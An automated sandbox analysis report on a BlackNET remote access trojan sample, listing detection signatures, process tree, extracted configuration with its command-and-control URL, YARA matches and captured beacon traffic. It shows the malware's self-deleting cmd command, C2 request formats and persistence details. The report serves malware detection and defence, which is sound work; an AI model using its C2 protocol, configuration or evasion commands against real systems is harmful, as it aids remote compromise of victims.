Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe

Overview

General Information

Sample Name:4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
Analysis ID:471063
MD5:bc15770f9c1c0735cb5cc9d800476ab0
SHA1:7700f53b4de7abcd0aa28a1989f73aad394b49bb
SHA256:4054ee21cbfc210489f119c2d717ca1ae43129fc0d07aefe322fabb3b61d079f
Tags:BlackNETexe
Infos:

Most interesting Screenshot:

Detection

BlackNET
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected BlackNET
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
.NET source code contains potential unpacker
Uses ping.exe to sleep
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 4804 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 5936 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 7100 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 7060 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 3028 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6036 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6752 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
    • winhost.exe (PID: 4112 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
      • cmd.exe (PID: 5580 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6492 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • winhost.exe (PID: 7000 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: BC15770F9C1C0735CB5CC9D800476AB0)
    • cmd.exe (PID: 6984 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del 'C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5668 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: BlackNET

{"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
  • 0x110c6:$s1: svchosts.exe
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
  • 0xe740:$s1: wireshark
  • 0xe6f6:$s2: procexp
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
  • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0xffc0:$s7: shutdown -r -t 00
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
  • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeJoeSecurity_BlackNETYara detected BlackNETJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    dropped/winhost.exeSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
    • 0x110c6:$s1: svchosts.exe
    dropped/winhost.exeMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
    • 0xe740:$s1: wireshark
    • 0xe6f6:$s2: procexp
    dropped/winhost.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
    • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
    • 0xffc0:$s7: shutdown -r -t 00
    dropped/winhost.exeHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
    • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
    dropped/winhost.exeJoeSecurity_BlackNETYara detected BlackNETJoe Security
      Click to see the 5 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
        00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
          0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
            00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
              00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmpJoeSecurity_BlackNETYara detected BlackNETJoe Security
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                19.2.winhost.exe.160000.0.unpackSUSP_Modified_SystemExeFileName_in_FileDetecst a variant of a system file name often used by attackers to cloak their activityFlorian Roth
                • 0x110c6:$s1: svchosts.exe
                19.2.winhost.exe.160000.0.unpackMAL_Winnti_Sample_May18_1Detects malware sample from Burning Umbrella report - Generic Winnti RuleFlorian Roth
                • 0xe740:$s1: wireshark
                • 0xe6f6:$s2: procexp
                19.2.winhost.exe.160000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
                • 0xec42:$x1: cmd.exe /c ping 0 -n 2 & del "
                • 0xffc0:$s7: shutdown -r -t 00
                19.2.winhost.exe.160000.0.unpackHKTL_NET_GUID_BlackNETDetects VB.NET red/black-team tools via typelibguidArnim Rupp
                • 0x125ff:$typelibguid0: c2b90883-abee-4cfa-af66-dfd93ec617a5
                19.2.winhost.exe.160000.0.unpackJoeSecurity_BlackNETYara detected BlackNETJoe Security
                  Click to see the 45 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpackMalware Configuration Extractor: BlackNET {"Host": "http://gpay-safe.ru/x/", "ID": "HaCk", "Starup Name": "a5b002eacf54590ec8401ff6d3f920ee", "Install Name": "winhost.exe", "Install Dir": "Temp ", "Delay": "1000", "Version": "v3.6.0 Public", "Network Seprator": "|BN|", "Mutex": "BN[vSqieqIW-9794388]"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeVirustotal: Detection: 68%Perma Link
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeMetadefender: Detection: 52%Perma Link
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeReversingLabs: Detection: 85%
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeAvira: detected
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: gpay-safe.ruVirustotal: Detection: 6%Perma Link
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeMetadefender: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeReversingLabs: Detection: 85%
                  Machine Learning detection for sampleShow sources
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeJoe Sandbox ML: detected
                  Source: 19.0.winhost.exe.160000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 16.0.winhost.exe.ae0000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 8.0.winhost.exe.720000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe:Zone.IdentifierJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeFile opened: C:\Users\user\Jump to behavior

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49724 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49725 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49726 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49727 -> 91.206.93.216:80
                  Source: TrafficSnort IDS: 2029179 ET TROJAN Win32/BlackNET CnC Keep-Alive 192.168.2.4:49730 -> 91.206.93.216:80
                  Uses ping.exe to check the status of other devices and networksShow sources
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 4000
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://gpay-safe.ru/x/
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /x/ HTTP/1.1Host: gpay-safe.ruConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36Host: gpay-safe.ru
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Aug 2021 22:49:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 70 61 79 2d 73 61 66 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.645343119.000000001BE94000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679709753.0000000002F6C000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.699597146.0000000002EA1000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru
                  Source: winhost.exe, winhost.exe, 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeString found in binary or memory: http://gpay-safe.ru/x/
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx
                  Source: winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ
                  Source: winhost.exe, 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.700029251.0000000002F20000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, winhost.exe, 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmpString found in binary or memory: http://gpay-safe.ru/x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQx
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.646554695.000000001BECF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.o
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.649141258.000000001BE94000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlx
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651883264.000000001BED7000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
